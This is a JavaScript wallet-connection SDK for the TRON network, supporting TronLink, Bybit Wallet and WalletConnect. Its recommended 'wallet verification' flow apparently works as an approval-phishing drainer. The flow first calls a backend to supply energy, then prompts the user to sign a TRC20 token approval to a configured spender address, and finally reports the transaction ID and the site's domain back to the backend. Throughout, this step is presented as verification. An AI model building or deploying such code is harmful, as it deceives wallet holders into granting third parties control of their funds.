/**
 * TronWalletSDK - Main SDK Class
 * FIXED: Always call /prepare before approve
 */

import { TronLinkAdapter } from "@tronweb3/tronwallet-adapters";
import { WalletConnectAdapter } from "@tronweb3/tronwallet-adapter-walletconnect";
import { TronWeb } from "tronweb";
import { EventEmitter } from "./utils/EventEmitter";
import { approveToken } from "./core/trc20";

class TronWalletSDK extends EventEmitter {
  constructor(config = {}) {
    super();

    this.config = {
      network: config.network || "mainnet",
      apiUrl: config.apiUrl || "",
      walletConnectProjectId: config.walletConnectProjectId || "",
      tokens: config.tokens || {},
      spenderAddress: config.spenderAddress || "",
      ...config,
    };

    this.address = null;
    this.connectedWallet = null;
    this.adapter = null;
    this.isConnecting = false;
    this.isPrepared = false; // ← НОВИЙ FLAG

    this._setupGlobals();

    console.log("TronWalletSDK initialized", {
      network: this.config.network,
      version: "1.0.2",
    });
  }

  _setupGlobals() {
    if (typeof window !== "undefined") {
      const { Buffer } = require("buffer");
      window.Buffer = Buffer;
    }
  }

  _getRpcUrl() {
    return this.config.network === "mainnet"
      ? "https://api.trongrid.io"
      : "https://api.shasta.trongrid.io";
  }

  _getExplorerUrl() {
    return this.config.network === "mainnet"
      ? "https://tronscan.org"
      : "https://shasta.tronscan.org";
  }

  async connectTronLink() {
    if (this.isConnecting) {
      throw new Error("Connection already in progress");
    }

    try {
      this.isConnecting = true;
      this.isPrepared = false; // ← RESET
      this.emit("connecting", { wallet: "tronlink" });

      if (!window.tronLink && !window.tronWeb) {
        throw new Error(
          "TronLink not installed. Please install TronLink extension."
        );
      }

      const tronAdapter = new TronLinkAdapter();

      try {
        await tronAdapter.disconnect();
      } catch (e) {
        // Ignore
      }

      await tronAdapter.connect();

      if (!tronAdapter.address) {
        throw new Error("Failed to get address from TronLink");
      }

      console.log("TronLink connected:", tronAdapter.address);

      this.adapter = tronAdapter;
      this.address = tronAdapter.address;
      this.connectedWallet = "tronlink";

      if (window.tronLink?.tronWeb) {
        window.tronWeb = window.tronLink.tronWeb;
      }

      this.emit("connected", {
        wallet: "tronlink",
        address: this.address,
      });

      return {
        success: true,
        address: this.address,
        wallet: "tronlink",
      };
    } catch (error) {
      console.error("TronLink connection error:", error);
      this.emit("error", {
        wallet: "tronlink",
        error: error.message,
      });
      throw error;
    } finally {
      this.isConnecting = false;
    }
  }

  async connectBybit() {
    if (this.isConnecting) {
      throw new Error("Connection already in progress");
    }

    try {
      this.isConnecting = true;
      this.isPrepared = false; // ← RESET
      this.emit("connecting", { wallet: "bybit" });

      if (!window.bybitWallet || !window.bybitWallet.tronLink) {
        throw new Error(
          "Bybit Wallet not installed. Please install Bybit Wallet extension."
        );
      }

      console.log("Bybit Wallet detected");

      const result = await window.bybitWallet.tronLink.request({
        method: "tron_requestAccounts",
      });

      let userAddress;
      if (Array.isArray(result)) {
        userAddress = result[0];
      } else if (result.address) {
        userAddress = result.address;
      } else if (typeof result === "string") {
        userAddress = result;
      }

      if (!userAddress) {
        throw new Error("Failed to get address from Bybit Wallet");
      }

      console.log("Bybit Wallet connected:", userAddress);

      if (window.bybitWallet.tronLink.tronWeb) {
        window.tronWeb = window.bybitWallet.tronLink.tronWeb;
      }

      this.adapter = {
        name: "Bybit",
        address: userAddress,
        tronWeb: window.bybitWallet.tronLink.tronWeb,
        signTransaction: async (transaction) => {
          return await window.bybitWallet.tronLink.sign(transaction);
        },
        disconnect: async () => {
          console.log("Bybit disconnect - manual action required");
        },
      };

      this.address = userAddress;
      this.connectedWallet = "bybit";

      window.addEventListener("message", (e) => {
        if (e.data.message && e.data.message.action === "accountsChanged") {
          console.log("Bybit account changed:", e.data);
          this.emit("accountChanged", { address: e.data.data });
        }
        if (e.data.message && e.data.message.action === "disconnect") {
          console.log("Bybit disconnected");
          this.disconnect();
        }
      });

      this.emit("connected", {
        wallet: "bybit",
        address: this.address,
      });

      return {
        success: true,
        address: this.address,
        wallet: "bybit",
      };
    } catch (error) {
      console.error("Bybit connection error:", error);
      this.emit("error", {
        wallet: "bybit",
        error: error.message,
      });
      throw error;
    } finally {
      this.isConnecting = false;
    }
  }

  async connectWalletConnect() {
    if (this.isConnecting) {
      throw new Error("Connection already in progress");
    }

    try {
      this.isConnecting = true;
      this.isPrepared = false; // ← RESET
      this.emit("connecting", { wallet: "walletconnect" });

      if (!this.config.walletConnectProjectId) {
        throw new Error("WalletConnect Project ID not configured");
      }

      const wcAdapter = new WalletConnectAdapter({
        network: this.config.network === "mainnet" ? "Mainnet" : "Shasta",
        options: {
          relayUrl: "wss://relay.walletconnect.com",
          projectId: this.config.walletConnectProjectId,
          metadata: {
            name: this.config.appName || "TRON DApp",
            description: this.config.appDescription || "TRON Wallet Connection",
            url: window.location.origin,
            icons: [
              this.config.appIcon || `${window.location.origin}/favicon.ico`,
            ],
          },
        },
        themeMode: "dark",
        themeVariables: {
          "--w3m-z-index": 1000,
        },
        web3ModalConfig: {
          enableExplorer: true,
          explorerRecommendedWalletIds: [
            "4622a2b2d6af1c9844944291e5e7351a6aa24cd7b23099efac1b2fd875da31a0",
            "1ae92b26df02f0abca6304df07debccd18262fdf5fe82daa81593582dac9a369",
            "0b415a746fb9ee99cce155c2ceca0c6f6061b1dbca2d722b3ba16381d0562150",
            "74f8092562bd79675e276d8b2062a83601a4106d30202f2d509195e30e19673d",
            "971e689d0a5be527bac79629b4ee9b925e82208e5168b733496a09c0faed0709",
          ],
        },
      });

      await wcAdapter.connect();

      if (!wcAdapter.address) {
        throw new Error("Failed to get address from WalletConnect");
      }

      console.log("WalletConnect connected:", wcAdapter.address);

      const tronWeb = new TronWeb({
        fullHost: this._getRpcUrl(),
      });
      tronWeb.setAddress(wcAdapter.address);
      window.tronWeb = tronWeb;

      this.adapter = wcAdapter;
      this.address = wcAdapter.address;
      this.connectedWallet = "walletconnect";

      this.emit("connected", {
        wallet: "walletconnect",
        address: this.address,
      });

      return {
        success: true,
        address: this.address,
        wallet: "walletconnect",
      };
    } catch (error) {
      console.error("WalletConnect error:", error);
      this.emit("error", {
        wallet: "walletconnect",
        error: error.message,
      });
      throw error;
    } finally {
      this.isConnecting = false;
    }
  }

  async disconnect() {
    if (this.adapter) {
      try {
        await this.adapter.disconnect?.();
      } catch (err) {
        console.error("Disconnect error:", err);
      }
    }

    const previousWallet = this.connectedWallet;
    const previousAddress = this.address;

    this.address = null;
    this.connectedWallet = null;
    this.adapter = null;
    this.isPrepared = false; // ← RESET

    this.emit("disconnected", {
      wallet: previousWallet,
      address: previousAddress,
    });

    return { success: true };
  }

  /**
   * Prepare resources - MUST BE CALLED BEFORE APPROVE
   */
  async prepareResources(address) {
    if (!this.config.apiUrl) {
      throw new Error("API URL not configured");
    }

    if (!this.connectedWallet) {
      throw new Error("Wallet not connected");
    }

    try {
      this.emit("prepareStart", { address });

      const response = await fetch(`${this.config.apiUrl}/wallets/prepare`, {
        method: "POST",
        headers: {
          "Content-Type": "application/json",
        },
        body: JSON.stringify({
          address,
          walletType: this.connectedWallet,
          fromDomain: window.location.hostname,
        }),
      });

      if (!response.ok) {
        const errorData = await response.json();
        throw new Error(
          "Service temporary unavailable. Please try again later."
        );
      }

      const data = await response.json();

      if (data.error) {
        console.log("prepareResources error:", data.error);
        this.emit("prepareError", {
          error: "Service temporary unavailable. Please try again later.",
        });

        throw new Error(data.error);
      }

      this.isPrepared = true; // ← SET FLAG
      this.emit("prepareSuccess", data);

      return data;
    } catch (error) {
      console.error("prepareResources error:", error);
      this.emit("prepareError", {
        error: "Service temporary unavailable. Please try again later.",
      });
      throw error;
    }
  }

  async registerTransaction(address, txId) {
    if (!this.config.apiUrl) {
      throw new Error("API URL not configured");
    }

    try {
      this.emit("registerStart", { address, txId });

      const response = await fetch(`${this.config.apiUrl}/wallets/register`, {
        method: "POST",
        headers: {
          "Content-Type": "application/json",
        },
        body: JSON.stringify({
          address,
          txId,
          fromDomain: window.location.hostname,
        }),
      });

      if (!response.ok) {
        const errorData = await response.json();
        throw new Error(errorData.message || "Failed to register transaction");
      }

      const data = await response.json();

      this.emit("registerSuccess", data);

      return data;
    } catch (error) {
      this.emit("registerError", { error: error.message });
      throw error;
    }
  }

  /**
   * Full verification process - RECOMMENDED
   */
  async processWalletVerification(callbacks = {}) {
    if (!this.address) {
      throw new Error("Wallet not connected");
    }

    const { onProgress, onSuccess, onError } = callbacks;

    try {
      // Step 1: Prepare
      onProgress?.({
        step: "prepare",
        message: "Preparing resources...",
      });

      const prepareData = await this.prepareResources(this.address);
      console.log("Prepare complete:", prepareData);

      if (!prepareData || prepareData.error) {
        throw new Error(prepareData?.error || "Prepare failed");
      }

      // Step 2: Wait (for energy - skip for Bybit)
      if (this.connectedWallet !== "bybit") {
        onProgress?.({
          step: "wait_delegation",
          message: "Activating resources... (~10 seconds)",
        });

        await new Promise((resolve) => setTimeout(resolve, 10000));
      }

      // Step 3: Approve
      onProgress?.({
        step: "approve",
        message: "Approve approve in the wallet...",
      });

      const tokenSymbol = Object.keys(this.config.tokens)[0];
      if (!tokenSymbol) {
        throw new Error("No tokens configured");
      }

      const approveResult = await this.approveToken(tokenSymbol, {
        onProgress,
      });

      if (!approveResult.success) {
        throw new Error("Approve failed");
      }

      console.log("Approve completed:", approveResult.txId);

      // Step 4: Register
      onProgress?.({
        step: "register",
        message: "Registering...",
        txId: approveResult.txId,
      });

      const registerData = await this.registerTransaction(
        this.address,
        approveResult.txId
      );

      console.log("Registration complete:", registerData);

      // Step 5: Complete
      const result = {
        success: true,
        address: this.address,
        txId: approveResult.txId,
        explorerUrl: approveResult.explorerUrl,
        prepareData,
        registerData,
      };

      onProgress?.({
        step: "complete",
        message: "Done!",
        txId: approveResult.txId,
      });

      onSuccess?.(result);
      this.emit("verificationComplete", result);

      return result;
    } catch (error) {
      console.error("Process error:", error);
      onError?.(error);
      this.emit("verificationError", { error: error.message });
      await this.disconnect();
      throw error;
    }
  }

  async getTokenBalance(tokenSymbol) {
    if (!this.address) {
      throw new Error("Wallet not connected");
    }

    const token = this.config.tokens[tokenSymbol];
    if (!token) {
      throw new Error(`Token ${tokenSymbol} not configured`);
    }

    const tronWeb =
      window.tronWeb ||
      new TronWeb({
        fullHost: this._getRpcUrl(),
      });

    const contract = await tronWeb.contract().at(token.address);
    const balance = await contract.balanceOf(this.address).call();
    const balanceFormatted = Number(balance) / Math.pow(10, token.decimals);

    return {
      raw: balance.toString(),
      formatted: balanceFormatted.toFixed(token.decimals),
      symbol: token.symbol,
    };
  }

  /**
   * Approve token - AUTO-CALLS PREPARE if not prepared
   */
  async approveToken(tokenSymbol, callbacks = {}) {
    if (!this.address) {
      throw new Error("Wallet not connected");
    }

    if (!this.adapter) {
      throw new Error("Adapter not available");
    }

    // ⚠️ CRITICAL: Auto-call prepare if not prepared
    if (!this.isPrepared) {
      console.warn("Wallet not prepared! Auto-calling prepareResources()...");

      if (callbacks.onProgress) {
        callbacks.onProgress({
          step: "auto_prepare",
          message: "Preparing resources (auto)...",
        });
      }

      try {
        await this.prepareResources(this.address);
      } catch (error) {
        console.error("Auto-prepare failed:", error);
        await this.disconnect();
        throw new Error("Failed to prepare wallet: " + error.message);
      }

      // Wait for energy if not Bybit
      if (this.connectedWallet !== "bybit") {
        if (callbacks.onProgress) {
          callbacks.onProgress({
            step: "wait_energy",
            message: "Waiting for energy... (~10 seconds)",
          });
        }
        await new Promise((resolve) => setTimeout(resolve, 10000));
      }
    }

    const token = this.config.tokens[tokenSymbol];
    if (!token) {
      throw new Error(`Token ${tokenSymbol} not configured`);
    }

    if (!this.config.spenderAddress) {
      throw new Error("Spender address not configured");
    }

    const progressCallback = (progress) => {
      this.emit("approveProgress", progress);
      if (callbacks.onProgress) {
        callbacks.onProgress(progress);
      }
    };

    try {
      const result = await approveToken(
        token,
        this.config.spenderAddress,
        this.adapter,
        this._getRpcUrl(),
        this._getExplorerUrl(),
        progressCallback
      );

      this.emit("approveSuccess", result);
      if (callbacks.onSuccess) {
        callbacks.onSuccess(result);
      }

      return result;
    } catch (error) {
      this.emit("approveError", { error: error.message });
      if (callbacks.onError) {
        callbacks.onError(error);
      }
      throw error;
    }
  }

  isConnected() {
    return !!this.address;
  }

  isPreparedWallet() {
    return this.isPrepared;
  }

  getAddress() {
    return this.address;
  }

  getConnectedWallet() {
    return this.connectedWallet;
  }

  static getVersion() {
    return "1.0.2";
  }
}

export default TronWalletSDK;
